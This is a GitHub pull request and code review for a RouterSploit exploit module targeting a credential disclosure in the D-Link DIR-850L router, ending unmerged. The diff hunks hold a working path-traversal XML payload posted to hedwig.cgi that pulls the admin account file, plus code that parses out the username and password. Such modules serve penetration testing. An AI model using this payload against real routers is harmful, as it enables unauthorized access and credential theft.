### PR TITLE
Add new exploit for D-Link DIR-850L

### PR DESCRIPTION
**Pull request by GH0st3rs**
D-Link DIR-850L Credential Disclosure

https://packetstormsecurity.com/files/145097/dlink-850-admin-creds-retriever.sh.txt

### CODE REVIEW

**Comment by GH0st3rs** [comment]
You are using pip version 9.0.1, however version 10.0.0 is available.
You should consider upgrading via the 'pip install --upgrade pip' command.
+pip install --user virtualenv
Traceback (most recent call last):
  File "/Users/travis/.pyenv/versions/2.7.13/bin/pip", line 7, in <module>
    from pip import main
ImportError: cannot import name main
The command "./.travis/install.sh" failed and exited with 1 during .
Your build has been stopped.
/Users/travis/.travis/job_stages: line 166: shell_session_update: command not found


Error not in my module!

File: routersploit/modules/exploits/routers/dlink/dir_850_admin_creds_disclosure.py [hunk 1]
```diff
@@ -0,0 +1,67 @@
...
+    validators,
+    http_request,
+    print_table,
+    print_success,
+    print_error,
+)
+
+
+class Exploit(exploits.Exploit):
+    """ Exploit template. """
```
Comment (lucyoa) [inline routersploit/modules/exploits/routers/dlink/dir_850_admin_creds_disclosure.py]: Please add docstrings

File: routersploit/modules/exploits/routers/dlink/dir_850_admin_creds_disclosure.py [hunk 2]
```diff
@@ -0,0 +1,67 @@
...
+            'https://blogs.securiteam.com/index.php/archives/3364'
+        ],
+        'devices': [
+            'D-Link DIR-850L',
+        ],
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
+    port = exploits.Option(80, 'Target Port')
+    request_body = ''
```
Comment (lucyoa) [inline routersploit/modules/exploits/routers/dlink/dir_850_admin_creds_disclosure.py]: It should be `response_body`

File: routersploit/modules/exploits/routers/dlink/dir_850_admin_creds_disclosure.py [hunk 3]
```diff
@@ -0,0 +1,67 @@
...
+        url = '{}:{}/hedwig.cgi'.format(self.target, self.port)
+        headers = {
+            "User-Agent": "Mozilla/4.0 (compatible; MSIE 5.5;Windows NT)",
+            "Content-Type": "text/xml",
+            "Accept-Encoding": "gzip, deflate",
+            "Cookie": "uid={random}".format(random=''.join([chr(randint(ord('a'), ord('z'))) for x in range(8)])),
+            "Connection": "close",
+        }
+        XML_DATA = "<?xml version='1.0' encoding='utf-8'?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>"
+        req = http_request(method='POST', url=url, headers=headers, data=XML_DATA)
```
Comment (lucyoa) [inline routersploit/modules/exploits/routers/dlink/dir_850_admin_creds_disclosure.py]: Change `req` -> `response`

File: routersploit/modules/exploits/routers/dlink/dir_850_admin_creds_disclosure.py [hunk 4]
```diff
@@ -0,0 +1,67 @@
...
+        if not req:
```
Comment (lucyoa) [inline routersploit/modules/exploits/routers/dlink/dir_850_admin_creds_disclosure.py]: `if not response`

File: routersploit/modules/exploits/routers/dlink/dir_850_admin_creds_disclosure.py [hunk 5]
```diff
@@ -0,0 +1,67 @@
...
+            return False
+        self.request_body = req.text
```
Comment (lucyoa) [inline routersploit/modules/exploits/routers/dlink/dir_850_admin_creds_disclosure.py]: Should be `self.response_body = response.text`

File: routersploit/modules/exploits/routers/dlink/dir_850_admin_creds_disclosure.py [hunk 6]
```diff
@@ -0,0 +1,67 @@
...
+        if self.check():
+            print_success("Target appears to be vulnerable")
+            creds = []
+            username = re.findall('<name>(.*)</name>', self.request_body)
+            if username:
+                creds.append(username[0])
+            password = re.findall('<password></password>', self.request_body)
+            if password:
+                creds.append(password[0])
+            print_table(['User', 'Password'], creds)
```
Comment (lucyoa) [inline routersploit/modules/exploits/routers/dlink/dir_850_admin_creds_disclosure.py]: Should be:
```python
print_table(('User', 'Password'), *creds)
```

File: routersploit/modules/exploits/routers/dlink/dir_850_admin_creds_disclosure.py [hunk 7]
```diff
@@ -0,0 +1,67 @@
...
+    def run(self):
+        if self.check():
+            print_success("Target appears to be vulnerable")
+            creds = []
+            username = re.findall('<name>(.*)</name>', self.request_body)
+            if username:
+                creds.append(username[0])
+            password = re.findall('<password></password>', self.request_body)
+            if password:
+                creds.append(password[0])
```
Comment (lucyoa) [inline routersploit/modules/exploits/routers/dlink/dir_850_admin_creds_disclosure.py]: The entire section above should be in a way that single record of creds is [username, password]
```python
creds.append((username[0], password[0]))
```

**Comment by GH0st3rs** [comment]
Fix it

**Comment by lucyoa** [comment]
We adjusted your module to new architecture: https://github.com/threat9/routersploit/blob/master/routersploit/modules/exploits/routers/dlink/dir_850l_creds_disclosure.py

**Pull request closed without merging**